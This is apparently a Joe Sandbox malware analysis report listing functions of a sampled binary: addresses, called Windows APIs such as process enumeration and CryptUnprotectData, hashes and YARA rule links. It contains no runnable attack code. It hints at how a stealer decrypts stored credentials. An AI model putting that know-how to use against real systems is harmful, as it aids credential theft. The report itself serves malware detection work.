Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: bfa8b9de06a602b8256db563655a98a4b16a43ce8b8a19a8e4b106683582f85c
Instruction ID: 8daaadad1d2e0fb008fe5b39836cee95564405ada69c2a7c4f4a744e1a7be223
Opcode Fuzzy Hash: bfa8b9de06a602b8256db563655a98a4b16a43ce8b8a19a8e4b106683582f85c
Instruction Fuzzy Hash: C2010CB5A14308ABDB20DFA6CD44BDDB7F8FB49700F104588E50996290D7309B44DF50

Function 00CF4573 Relevance: 7.3, Strings: 2, Instructions: 4819COMMON

Download Yara Rule

Strings

<7\h, xrefs: 00CF4752
huzx, xrefs: 00CF48F0

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: <7\h$huzx
API String ID: 0-2989614873
Opcode ID: 1d306a64b32ec80efcd30ebbf21bf8be57d4a3a31a1eaaf5b560232c1a76f8cf
Instruction ID: 1d317113871c5f7f2e7dca130de5537b005903fe8f504941d585a48460312d95
Opcode Fuzzy Hash: 1d306a64b32ec80efcd30ebbf21bf8be57d4a3a31a1eaaf5b560232c1a76f8cf
Instruction Fuzzy Hash: AB63437241EBD81ECB27CB3047B61A17F66BA1321031949CEC7D18F5B3C694AA1AE357

Function 00CE9030 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,00CD51D4,40000001,00000000,00000000,?,00CD51D4), ref: 00CE9050

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: 931e90bb8cb9f3e569d5f5987ca59d1c298cb124c15fe5f49d97fdcc38ae6fed
Instruction ID: 851449e398424165724dd79bd3fd8790f97680260f1a83ca829cecea4b65415d
Opcode Fuzzy Hash: 931e90bb8cb9f3e569d5f5987ca59d1c298cb124c15fe5f49d97fdcc38ae6fed
Instruction Fuzzy Hash: 3711F5B0204248FFDB00DF56DC84FAA33A9EF8A310F508448FA298B250D775E9419BA0

Function 00CDA210 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00CD4F3E,00000000,00000000), ref: 00CDA23F
LocalAlloc.KERNEL32(00000040,?,?,?,00CD4F3E,00000000,?), ref: 00CDA251
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00CD4F3E,00000000,00000000), ref: 00CDA27A
LocalFree.KERNEL32(?,?,?,?,00CD4F3E,00000000,?), ref: 00CDA28F

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: c123ce3c3d4190f667bb6000a79c2cdae8d5a38ca6865a030808ea31e95aa457
Instruction ID: 675d541c9cd89f00605de0a0e120b8f088acca884d5febae5a2929236a4b83d4
Opcode Fuzzy Hash: c123ce3c3d4190f667bb6000a79c2cdae8d5a38ca6865a030808ea31e95aa457
Instruction Fuzzy Hash: D511A7B4240308AFEB11DF54CC55FAA77B5EB89B10F208459FE199B390C772A941DB54

Function 00CE7BC0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0159DC20,00000000,?,00CF0DF8,00000000,?,00000000,00000000), ref: 00CE7BF3
RtlAllocateHeap.NTDLL(00000000), ref: 00CE7BFA
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0159DC20,00000000,?,00CF0DF8,00000000,?,00000000,00000000,?), ref: 00CE7C0D
wsprintfA.USER32 ref: 00CE7C47

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID:
API String ID: 3317088062-0
Opcode ID: e55982d7fa0f3dcfd46a71d968a6014e90ddfe4883c70dfde1acb6240a16ef25
Instruction ID: aa9eb0c044affd82c88a11d007276569e5af7caff9d2a73ffd8662a68da18778
Opcode Fuzzy Hash: e55982d7fa0f3dcfd46a71d968a6014e90ddfe4883c70dfde1acb6240a16ef25
Instruction Fuzzy Hash: A011E1B1A09358EBEB20DB55DC49FA9B7B8FB41710F1043E5F61A932C0D7741A408F50

Function 0112D5DC Relevance: 5.4, Strings: 3, Instructions: 1629COMMON

Download Yara Rule

Strings

93K0, xrefs: 0112E8BC
*x4', xrefs: 0112E0F6
C]I>, xrefs: 0112DFBE

Memory Dump Source

Source File: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: *x4'$93K0$C]I>
API String ID: 0-584675010
Opcode ID: 8727ad7b917e7c0a2a701e2b98c7dc9af3b200a26635e80e0ea9b631c03b6721
Instruction ID: 0ce93ee6bf239683a5b1f2423f97e0ba603f616f18beab684f1e42090d09eb35
Opcode Fuzzy Hash: 8727ad7b917e7c0a2a701e2b98c7dc9af3b200a26635e80e0ea9b631c03b6721
Instruction Fuzzy Hash: 4CB207F360C2049FE708AE2DEC8577ABBE9EF94720F1A493DE6C5C3740E63558058696

Function 0112F926 Relevance: 4.7, Strings: 3, Instructions: 920COMMON

Download Yara Rule

Strings

WO, xrefs: 0112FD2D
g, xrefs: 0112FADA
g, xrefs: 0112FB08

Memory Dump Source

Source File: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: WO$g$g
API String ID: 0-2801880224
Opcode ID: d79c45c599a6b73b2124eaae19a6c9a7f382b55d78bb5f7cf05f76ab409e3121
Instruction ID: d44aadbff42b1d264902471bc28cf677caf0a2703a21de626a73e65c0449c1c4
Opcode Fuzzy Hash: d79c45c599a6b73b2124eaae19a6c9a7f382b55d78bb5f7cf05f76ab409e3121
Instruction Fuzzy Hash: F452D7F360C204AFE7086E2DEC8577ABBE9EB94320F16453DE6C5C3744EA3598418796

Function 00CE3970 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(00CEE120,00000000,00000001,00CEE110,00000000), ref: 00CE39A8
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00CE3A00

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID:
API String ID: 123533781-0
Opcode ID: 5b74ac43970e67debd741316b9c271f4bfbb00fe56c923c5c2492b1956211d5c
Instruction ID: 1cad0fa45ffdd6e11a0b734be15a8a0345ee8d9be460c0c7f072085765118070
Opcode Fuzzy Hash: 5b74ac43970e67debd741316b9c271f4bfbb00fe56c923c5c2492b1956211d5c
Instruction Fuzzy Hash: A041E570A00A689FDB24DB59CC95F9BB7B5AB48702F4041D8E608EB2D0D7B16EC5CF50

Function 00CDA2B0 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00CDA2D4
LocalAlloc.KERNEL32(00000040,00000000), ref: 00CDA2F3
LocalFree.KERNEL32(?), ref: 00CDA323

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 97b5ed80b8c2186016c3460afb419c391905975ab38574e83201fe94ff04c7e6
Instruction ID: 95ae4ca406e6f003bce416ebb4fd0e7193ee247ebf4bcfd09af7731530719e63
Opcode Fuzzy Hash: 97b5ed80b8c2186016c3460afb419c391905975ab38574e83201fe94ff04c7e6
Instruction Fuzzy Hash: 9111E8B9A00209DFCB04DFA4D885EAEB7B5FB89300F108559ED1597350D730AE51CF61

Function 00D44BA8 Relevance: 3.4, Strings: 2, Instructions: 941COMMON

Download Yara Rule

Strings

__ZN, xrefs: 00D44FDF
?, xrefs: 00D454D5

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: ?$__ZN
API String ID: 0-1427190319
Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
Instruction ID: dca9700691c7599dbf2ac97bc53e9f76170b65f1ddee5188ecced992af4c3af8
Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
Instruction Fuzzy Hash: FA722372908B109BD714CF28D88076AB7E2EFD5310F598A1EF8D55B29AD370DC458BA1

Function 012024BA Relevance: 2.6, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

)QFu, xrefs: 01202577
sfF, xrefs: 012025D6

Memory Dump Source

Source File: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: )QFu$sfF
API String ID: 0-2806265007
Opcode ID: 7381daa3b8929f5c040d2a7cfbb7705f85e5fc9165b698be9050a9255a65c567
Instruction ID: f0917423953f64fccbade838747999e926de9408461f38850fde59b037faa6c2
Opcode Fuzzy Hash: 7381daa3b8929f5c040d2a7cfbb7705f85e5fc9165b698be9050a9255a65c567
Instruction Fuzzy Hash: AB31A2B261C7049FE300BE6DDC857AAFBE5EF98220F16892DD6D4C7654E63094548A83

Function 00D25DB9 Relevance: 2.5, Strings: 1, Instructions: 1234COMMON

Download Yara Rule

Strings

xn--, xrefs: 00D26009

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: xn--
API String ID: 0-2826155999
Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
Instruction ID: 4801b5e88a6dcf6fc28444fe4c6ef6aa1adf1e16e0f661bfe29ea22220407124
